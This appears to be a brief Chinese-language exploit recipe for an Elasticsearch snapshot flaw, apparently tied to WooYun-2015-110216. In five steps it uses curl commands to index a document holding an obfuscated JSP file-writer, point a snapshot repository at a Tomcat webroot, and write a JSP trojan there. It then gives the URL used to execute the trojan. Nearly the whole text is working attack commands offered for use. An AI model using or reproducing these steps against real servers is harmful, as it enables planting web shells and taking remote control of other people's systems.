1.创建索引文档
curl -XPOST http://192.168.0.131:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'
2.再创建一个恶意的存储库,其中location的值即为我要写入的路径
curl -XPUT 'http://192.168.0.131:9200/_snapshot/yz.jsp' -d '{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}'
3.存储库验证并创建:
curl -XPUT "http://192.168.0.131:9200/_snapshot/yz.jsp/yz.jsp" -d '{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}'
4.下面的url中的f=的参数就是写入文档中的内容,可以写入jsp木马-注意是8080端口
http://192.168.0.131:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=wooYun-2015-110216
5.写入木马后访问-注意是8080端口
http://192.168.0.131:8080/wwwroot/test.jsp //就可以执行里面的内容